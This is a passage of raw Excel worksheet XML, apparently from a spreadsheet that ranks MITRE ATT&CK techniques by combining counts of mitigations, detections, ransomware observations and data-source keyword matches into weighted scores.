        <f t="array" ref="AH93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC93)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI93" s="25">
        <f>IF(AH93="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ93" s="25" t="str" cm="1">
        <f t="array" ref="AJ93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC93)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK93" s="25">
        <f>IF(AJ93="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL93" s="25" t="str" cm="1">
        <f t="array" ref="AL93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC93)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM93" s="25">
        <f>IF(AL93="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN93" s="58">
        <v>7</v>
      </c>
      <c r="AO93" s="51">
        <v>1</v>
      </c>
      <c r="AP93" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.26993031350980956</v>
      </c>
      <c r="AQ93" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12198993392158732</v>
      </c>
      <c r="AR93" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12198993392158732</v>
      </c>
      <c r="AS93" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT93" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU9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94" spans="1:47" ht="32.1">
      <c r="A94" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.789565626000001E-2</v>
      </c>
      <c r="B94" s="25">
        <f>SUM(H94,M94,V94)*(1+SUM(AE94,AG94,AI94,AK94,AM94))</f>
        <v>0.54562322926666673</v>
      </c>
      <c r="C94" s="25" t="s">
        <v>456</v>
      </c>
      <c r="D94" s="25" t="s">
        <v>457</v>
      </c>
      <c r="E94" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F94" s="51">
        <v>1</v>
      </c>
      <c r="G94" s="51">
        <v>3</v>
      </c>
      <c r="H94" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I94">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J94">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K94">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L94">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M94" s="44">
        <v>7.1922000000000002E-4</v>
      </c>
      <c r="N94" s="51">
        <v>0</v>
      </c>
      <c r="O94" s="51">
        <v>5</v>
      </c>
      <c r="P94" s="51">
        <v>3</v>
      </c>
      <c r="Q94" s="51">
        <v>0</v>
      </c>
      <c r="R94" s="52" t="s">
        <v>458</v>
      </c>
      <c r="S94" s="51">
        <v>7</v>
      </c>
      <c r="T94" s="52" t="s">
        <v>140</v>
      </c>
      <c r="U94" s="51">
        <v>11</v>
      </c>
      <c r="V94" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20952380952380953</v>
      </c>
      <c r="W94">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X94">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y94">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z94">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA94">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB94">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC94" s="29" t="s">
        <v>256</v>
      </c>
      <c r="AD94" s="25" t="str" cm="1">
        <f t="array" ref="AD94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC94)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE94" s="25">
        <f>IF(AD94="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF94" s="25" t="str" cm="1">
        <f t="array" ref="AF94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC94)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG94" s="25">
        <f>IF(AF94="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH94" s="25" t="str" cm="1">
        <f t="array" ref="AH94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC94)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI94" s="25">
        <f>IF(AH94="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ94" s="25" t="str" cm="1">
        <f t="array" ref="AJ94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC94)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK94" s="25">
        <f>IF(AJ94="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL94" s="25" t="str" cm="1">
        <f t="array" ref="AL94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC94)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM94" s="25">
        <f>IF(AL94="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN94" s="52">
        <v>1</v>
      </c>
      <c r="AO94" s="51">
        <v>1</v>
      </c>
      <c r="AP94" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.789565626000001E-2</v>
      </c>
      <c r="AQ94" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18187440975555558</v>
      </c>
      <c r="AR94" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18187440975555558</v>
      </c>
      <c r="AS94" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT94" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU9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95" spans="1:47" ht="32.1">
      <c r="A95" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.5190029029999997E-2</v>
      </c>
      <c r="B95" s="25">
        <f>SUM(H95,M95,V95)*(1+SUM(AE95,AG95,AI95,AK95,AM95))</f>
        <v>0.55190029029999998</v>
      </c>
      <c r="C95" s="25" t="s">
        <v>459</v>
      </c>
      <c r="D95" s="25" t="s">
        <v>460</v>
      </c>
      <c r="E95" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F95" s="51">
        <v>1</v>
      </c>
      <c r="G95" s="51">
        <v>1</v>
      </c>
      <c r="H95" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I95">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J95">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K95">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L95">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M95" s="44">
        <v>6.7690999999999997E-4</v>
      </c>
      <c r="N95" s="51">
        <v>0</v>
      </c>
      <c r="O95" s="51">
        <v>0</v>
      </c>
      <c r="P95" s="51">
        <v>0</v>
      </c>
      <c r="Q95" s="51">
        <v>0</v>
      </c>
      <c r="R95" s="52" t="s">
        <v>461</v>
      </c>
      <c r="S95" s="51">
        <v>14</v>
      </c>
      <c r="T95" s="52" t="s">
        <v>462</v>
      </c>
      <c r="U95" s="51">
        <v>19</v>
      </c>
      <c r="V95" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31428571428571428</v>
      </c>
      <c r="W95">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>33</v>
      </c>
      <c r="X95">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.6</v>
      </c>
      <c r="Y95">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.6</v>
      </c>
      <c r="Z95">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA95">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB95">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC95" s="29" t="s">
        <v>210</v>
      </c>
      <c r="AD95" s="25" t="str" cm="1">
        <f t="array" ref="AD95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC95)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE95" s="25">
        <f>IF(AD95="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF95" s="25" t="str" cm="1">
        <f t="array" ref="AF95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC95)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG95" s="25">
        <f>IF(AF95="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH95" s="25" t="str" cm="1">
        <f t="array" ref="AH95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC95)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI95" s="25">
        <f>IF(AH95="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ95" s="25" t="str" cm="1">
        <f t="array" ref="AJ95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC95)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK95" s="25">
        <f>IF(AJ95="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL95" s="25" t="str" cm="1">
        <f t="array" ref="AL95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC95)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM95" s="25">
        <f>IF(AL95="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN95" s="60">
        <v>0</v>
      </c>
      <c r="AO95" s="51">
        <v>0</v>
      </c>
      <c r="AP95" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.5190029029999997E-2</v>
      </c>
      <c r="AQ95" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18396676343333332</v>
      </c>
      <c r="AR95" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18396676343333332</v>
      </c>
      <c r="AS95" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT95" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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96" spans="1:47" ht="32.1">
      <c r="A96" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7444412380952379E-2</v>
      </c>
      <c r="B96" s="25">
        <f>SUM(H96,M96,V96)*(1+SUM(AE96,AG96,AI96,AK96,AM96))</f>
        <v>0.47444412380952383</v>
      </c>
      <c r="C96" s="25" t="s">
        <v>463</v>
      </c>
      <c r="D96" s="25" t="s">
        <v>464</v>
      </c>
      <c r="E96" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F96" s="51">
        <v>1</v>
      </c>
      <c r="G96" s="51">
        <v>0</v>
      </c>
      <c r="H96" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I96">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J96">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K96">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L96">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M96" s="44">
        <v>6.3460000000000003E-4</v>
      </c>
      <c r="N96" s="51">
        <v>0</v>
      </c>
      <c r="O96" s="51">
        <v>2</v>
      </c>
      <c r="P96" s="51">
        <v>3</v>
      </c>
      <c r="Q96" s="51">
        <v>0</v>
      </c>
      <c r="R96" s="52" t="s">
        <v>465</v>
      </c>
      <c r="S96" s="51">
        <v>16</v>
      </c>
      <c r="T96" s="52" t="s">
        <v>466</v>
      </c>
      <c r="U96" s="51">
        <v>26</v>
      </c>
      <c r="V96" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.42380952380952386</v>
      </c>
      <c r="W96">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>42</v>
      </c>
      <c r="X96">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="Y96">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="Z96">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA96">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB96">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC96" s="29" t="s">
        <v>467</v>
      </c>
      <c r="AD96" s="25" t="str" cm="1">
        <f t="array" ref="AD96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC96)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE96" s="25">
        <f>IF(AD96="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF96" s="25" t="str" cm="1">
        <f t="array" ref="AF96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC96)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG96" s="25">
        <f>IF(AF96="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH96" s="25" t="str" cm="1">
        <f t="array" ref="AH96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC96)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI96" s="25">
        <f>IF(AH96="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ96" s="25" t="str" cm="1">
        <f t="array" ref="AJ96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC96)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK96" s="25">
        <f>IF(AJ96="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL96" s="25" t="str" cm="1">
        <f t="array" ref="AL96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC96)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM96" s="25">
        <f>IF(AL96="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN96" s="52">
        <v>0</v>
      </c>
      <c r="AO96" s="51">
        <v>0</v>
      </c>
      <c r="AP96" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7444412380952379E-2</v>
      </c>
      <c r="AQ96" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15814804126984128</v>
      </c>
      <c r="AR96" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15814804126984128</v>
      </c>
      <c r="AS96" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT96" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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97" spans="1:47" ht="111.95">
      <c r="A97" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16194458592761907</v>
      </c>
      <c r="B97" s="25">
        <f>SUM(H97,M97,V97)*(1+SUM(AE97,AG97,AI97,AK97,AM97))</f>
        <v>0.61944585927619045</v>
      </c>
      <c r="C97" s="25" t="s">
        <v>468</v>
      </c>
      <c r="D97" s="25" t="s">
        <v>469</v>
      </c>
      <c r="E97" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F97" s="51">
        <v>1</v>
      </c>
      <c r="G97" s="51">
        <v>1</v>
      </c>
      <c r="H97" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I97">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J97">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K97">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L97">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M97" s="44">
        <v>6.3460000000000003E-4</v>
      </c>
      <c r="N97" s="51">
        <v>0</v>
      </c>
      <c r="O97" s="51">
        <v>2</v>
      </c>
      <c r="P97" s="51">
        <v>1</v>
      </c>
      <c r="Q97" s="51">
        <v>1</v>
      </c>
      <c r="R97" s="52" t="s">
        <v>470</v>
      </c>
      <c r="S97" s="51">
        <v>12</v>
      </c>
      <c r="T97" s="51" t="s">
        <v>471</v>
      </c>
      <c r="U97" s="51">
        <v>18</v>
      </c>
      <c r="V97" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.30476190476190473</v>
      </c>
      <c r="W97">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>30</v>
      </c>
      <c r="X97">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Y97">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Z97">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA97">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB97">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC97" s="29" t="s">
        <v>472</v>
      </c>
      <c r="AD97" s="25" t="str" cm="1">
        <f t="array" ref="AD97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC97)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE97" s="25">
        <f>IF(AD97="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF97" s="25" t="str" cm="1">
        <f t="array" ref="AF97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC97)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG97" s="25">
        <f>IF(AF97="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH97" s="25" t="str" cm="1">
        <f t="array" ref="AH97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC97)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI97" s="25">
        <f>IF(AH97="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ97" s="25" t="str" cm="1">
        <f t="array" ref="AJ97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC97)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK97" s="25">
        <f>IF(AJ97="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL97" s="25" t="str" cm="1">
        <f t="array" ref="AL97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC97)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM97" s="25">
        <f>IF(AL97="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN97" s="52">
        <v>3</v>
      </c>
      <c r="AO97" s="51">
        <v>1</v>
      </c>
      <c r="AP97" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16194458592761907</v>
      </c>
      <c r="AQ97" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20648195309206349</v>
      </c>
      <c r="AR97" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20648195309206349</v>
      </c>
      <c r="AS97" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
